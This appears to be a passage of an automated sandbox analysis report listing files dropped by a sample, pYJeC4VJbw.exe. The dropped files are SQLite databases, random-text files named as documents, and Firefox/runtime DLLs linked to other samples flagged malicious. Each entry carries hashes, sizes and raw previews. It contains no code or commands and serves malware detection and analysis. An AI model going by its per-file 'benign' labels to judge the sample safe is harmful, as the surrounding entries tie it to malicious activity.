                                                                                                    MD5:159C7BA9D193731A3AAE589183A63B3F
                                                                                                    SHA1:81FDFC9C96C5B4F9C7730127B166B778092F114A
                                                                                                    SHA-256:1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
                                                                                                    SHA-512:2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
                                                                                                    Malicious:false
                                                                                                    Reputation:moderate, very likely benign file
                                                                                                    Preview:DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP

                                                                                                    C:\ProgramData\GIJKKKFC

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):106496
                                                                                                    Entropy (8bit):1.1358696453229276
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                    Malicious:false
                                                                                                    Reputation:high, very likely benign file
                                                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                    C:\ProgramData\HIIIDAKKJJJKKECAKKJE

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                    Category:dropped
                                                                                                    Size (bytes):49152
                                                                                                    Entropy (8bit):0.8180424350137764
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                    Malicious:false
                                                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                    C:\ProgramData\IDAKJKEHDBGHIDHIEHDBAAFHJK

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5242880
                                                                                                    Entropy (8bit):0.037963276276857943
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                    MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                    SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                    SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                    SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                    Malicious:false
                                                                                                    Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                    C:\ProgramData\JDBFIIEBGCAKKEBFBAAF

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                    Category:dropped
                                                                                                    Size (bytes):40960
                                                                                                    Entropy (8bit):0.8553638852307782
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                    Malicious:false
                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                    C:\ProgramData\JDGCGHCGHCBFHJJKKJEHJEHJEH

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):98304
                                                                                                    Entropy (8bit):0.08235737944063153
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                    Malicious:false
                                                                                                    Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                    C:\ProgramData\KATAXZVCPS.xlsx

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1026
                                                                                                    Entropy (8bit):4.699548026888946
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                    MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                    SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                    SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                    SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                    Malicious:false
                                                                                                    Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

                                                                                                    C:\ProgramData\NHPKIZUUSG.docx

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1026
                                                                                                    Entropy (8bit):4.70435191336402
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:q83Oua2II99Dm5Xcf7kmp5fFjUTZF/+akoYY9fBpCtJ6Wi5v:7OD2ISi5Xcz9l8RkcFCJ6Wix
                                                                                                    MD5:8C1F71001ABC7FCE68B3F15299553CE7
                                                                                                    SHA1:382285FB69081EB79C936BC4E1BFFC9D4697D881
                                                                                                    SHA-256:DCC1D5A624022EFCE4D4A919041C499622A1213FD62B848C36E6252EE29B5CAE
                                                                                                    SHA-512:8F2124445F7856BFFBB3E7067135CFA70BFB657F8CEAEE89312CF15CFA127CACF28C2F1F9CD1CC64E56A8D8C248E237F2E97F968D244C457AD95D0AD5144E2A7
                                                                                                    Malicious:false
                                                                                                    Preview:NHPKIZUUSGERQSLBGSEAVXGNDWXNHRIMGKQZIYGMNAKLDSDLMZTSHWNQSMRLTOXKIQVZWPTPMYGCCCTOQMOFGPYVVCCUDORIXMMXDHKCETULBHLJENABEIJPTFOHFPIUUSFPUHSBHENDANFMOYZRZAXYVFEZIKDKUEVZAWEFKRTUJZPFUDMEZZQVBGYMMIHKEBYJMJMTTXSDTDQAUATXLABLBEJUBBPSXZPXMHVNHOHYPKCYLDVGJSBPEXWGYVPHWPWLYJIOFFNQHAOBSRORLXUKIHEETKPFDPHQAGTKOMEWPBYGMTXHOQFINPIQARIVGCFUFIETTFUMCUDHRHCSTIZWRDJEHWOLAFOSWAVIGSWONBSKFWHCQAGHLWBKAFUQUULJRVZNUGGVOCCVTTWZEZFPJKZDJMHDYXQKDPLRECPAAEZVBXFDGZJIUGNMOEAISGBSPVTDRADHODLAXUFWZVTJPIGKERLENNAJHHHNNAPBWXCOGJSNVQJJEEPSMESQKGYOHXVMZQNSMSJHQHSGCJZCBZJXMLGNQQKZRIQSQCAWXZFCRMGMMLKHZDWNQTXPTYWGWNQQEQWEZJPQVPOASQIIJYWPUVLHFSLMGHWITYEKRNYGXYTAJZSRGYUWTMRNOICIEPMAYUOIDDOUSYSPAILYQQLYDTBOTEDGSCNXDRRQMOBWCQMDCQXTPEXDKPLVRMFZSKERSAULAYLSOJGDMFTZECKZYYLQVVDOMXISCOBUPPSAYUFOWOCBDJALHRAXDIKEMRYGQMEYTENAHXKWSVJEDEJTIUWZDHLIBKQRVMQLSAYIIOZDWWOLHCJUVJVRYJLTIENWCTYDOSJVSFUHOQPOXCMFGTAWFRCZJNYBCRPUFRUMZIBQDOVOBMFCHMMFHSSJZDCZNMWNCNSQMZWHCOEYNCAFONSABBQCKAPFWJIGKNUCUJZWUKRWIOFVWQWFSYAHDWXEMJKFZYMRVIRAMPVKBXONBJFTXIBDAYIE

                                                                                                    C:\ProgramData\VLZDGUKUTZ.xlsx

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1026
                                                                                                    Entropy (8bit):4.701757898321461
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                    MD5:520219000D5681B63804A2D138617B27
                                                                                                    SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                    SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                    SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                    Malicious:false
                                                                                                    Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

                                                                                                    C:\ProgramData\XZXHAVGRAG.docx

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1026
                                                                                                    Entropy (8bit):4.69156792375111
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                    MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                    SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                    SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                    SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                    Malicious:false
                                                                                                    Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

                                                                                                    C:\ProgramData\XZXHAVGRAG.xlsx

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1026
                                                                                                    Entropy (8bit):4.69156792375111
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                    MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                    SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                    SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                    SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                    Malicious:false
                                                                                                    Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

                                                                                                    C:\ProgramData\freebl3.dll

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):685392
                                                                                                    Entropy (8bit):6.872871740790978
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                    MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                    SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                    SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                    SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Joe Sandbox View:
                                                                                                    • Filename: Wb9LZ5Sn1l.exe, Detection: malicious, Browse
                                                                                                    • Filename: c4RAHq3BNl.exe, Detection: malicious, Browse
                                                                                                    • Filename: exDbnS3M12.exe, Detection: malicious, Browse
                                                                                                    • Filename: qa4Ulla1BY.exe, Detection: malicious, Browse
                                                                                                    • Filename: U8uFcjIjAR.exe, Detection: malicious, Browse
                                                                                                    • Filename: JlvRdFpwOD.exe, Detection: malicious, Browse
                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                    • Filename: 0dN59ZIkEM.exe, Detection: malicious, Browse
                                                                                                    • Filename: 34cFFMVY3B.exe, Detection: malicious, Browse
                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                    C:\ProgramData\mozglue.dll

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):608080
                                                                                                    Entropy (8bit):6.833616094889818
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                    MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                    SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                    SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                    SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Joe Sandbox View:
                                                                                                    • Filename: Wb9LZ5Sn1l.exe, Detection: malicious, Browse
                                                                                                    • Filename: c4RAHq3BNl.exe, Detection: malicious, Browse
                                                                                                    • Filename: exDbnS3M12.exe, Detection: malicious, Browse
                                                                                                    • Filename: qa4Ulla1BY.exe, Detection: malicious, Browse
                                                                                                    • Filename: U8uFcjIjAR.exe, Detection: malicious, Browse
                                                                                                    • Filename: JlvRdFpwOD.exe, Detection: malicious, Browse
                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                    • Filename: 0dN59ZIkEM.exe, Detection: malicious, Browse
                                                                                                    • Filename: 34cFFMVY3B.exe, Detection: malicious, Browse
                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                    C:\ProgramData\msvcp140.dll

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):450024
                                                                                                    Entropy (8bit):6.673992339875127
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                    MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                    SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                    SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                    SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
